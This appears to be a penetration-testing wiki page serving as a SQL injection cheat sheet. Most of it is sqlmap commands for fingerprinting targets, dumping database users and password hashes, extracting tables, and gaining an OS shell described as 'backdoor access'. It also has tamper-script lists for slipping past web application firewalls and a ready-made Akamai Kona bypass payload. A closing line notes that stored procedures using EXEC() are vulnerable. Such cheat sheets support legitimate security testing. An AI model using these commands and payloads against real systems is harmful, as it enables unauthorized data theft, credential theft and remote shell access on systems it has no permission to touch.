Skip to content

SQL Injection

SQL Injection

SQL Injection Wiki
SQL Injection CheatSheet

PowerShell Toolkit for Attacking SQL Server
SQL Injection with Code Execution in memory
Auto SQLmap
A Python Framework For NoSQL Scanning and Exploitation
Auto SQLi through google dorking
SQL Injection cheatsheet
Oracle Database Attacking Tool
Microsoft SQL Database Attacking Tool
SQL Vulnerability Scanner
MongoDB auditing and pentesting tool
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

SQLMap

Clone from dev for bleeding edge:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Initial information of Injection

Fingerprinting:

./sqlmap.py -u <request-file> --fingerprint --dns-domain=dns.example.org

Get Database banner:

./sqlmap.py --url="<url>" --data="<post-data>" --banner

Get database username, name, and hostname

./sqlmap.py -u <request-file> --current-user --current-db --hostname

Run SQLMap via a Request file

python sqlmap-dev/sqlmap.py -r login-request.txt

Sample Request File

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=%INJECT HERE%

Bypassing

Identify WAF

./sqlmap.py -u <request-file> --identify-waf --safe-url=https://mail.google.com/inbox --user-agent=AGENT

Bypass CSRF:

./sqlmap.py --csrf-url=https://www.gmail.com/login --csrf-token=CSRF_TOKEN

Tamper Scripts:

sqlmap.py -r reg.txt --levelv=3 --risk=3 -p keys --dbms=mysql --tamper=space2comments,randomcomments --proxy=http://localhost:8888

Checking Permissions

Check if user is a database admin

./sqlmap.py -u <request-file> --is-dba

Get database users and password hashes

./sqlmap.py -u <request-file> --users --passwords --privileges --roles --dbs

Dumping Database

Enumerate databases

./sqlmap.py -u <request-file> --dbs

Extract data

./sqlmap.py -u <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

List tables for one database

./sqlmap.py -u <request-file> -D <db-name> --tables

List columns for one database

./sqlmap.py -u <request-file> -D <db-name> --columns

List schema for one database

./sqlmap.py -u <request-file> -D <db-name> --schema

Other database flags

./sqlmap.py -u <request-file> -D <db-name> --count

Execute SQL Query

./sqlmap.py -u <request-file> --sql-query="<sql-query>"

Append/Prepend SQL Queries

./sqlmap.py -u <request-file> --prefix="<sql-query>" --suffix="<sql-query>"

Get backdoor access to sql server | can give shell access

./sqlmap.py -u <request-file> --os-shell

Run from file with threads:

python sqlmap-dev/sqlmap.py -r login-request.txt --threads=10

Run from file with threads and level:

python sqlmap-dev/sqlmap.py -r login-request.txt --level=5 --risk=3

Tampering:

General Tamper Testing:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL Tamper Testing:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL Tamper Testing:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Bypassing

Akamai Kona Bypass

  • MID instead of SUBSTRING
  • LIKE instead of =
  • /**/ instead of a space
  • CURRENT_USER instead of CURRENT_USER()
  • " instead of '

Final example: 

444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#

Blogs

  • https://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
  • https://isc.sans.edu/diary.html?storyid=9397
  • http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
  • http://www.sqlteam.com/article/sql-server-versions
  • http://www.owasp.org/index.php/Testing_for_MS_Access
  • http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html
  • http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
  • http://www.youtube.com/watch?v=WkHkryIoLD0
  • http://vimeo.com/3418947
  • http://websec.files.wordpress.com/2010/11/sqli2.pdf

Stored Procedure

Stored procedures are only safe if EXEC() is not being used. If you use EXEC() with dynamic content, you're vulnerable to SQL injections exactly as if you were executing the query manually.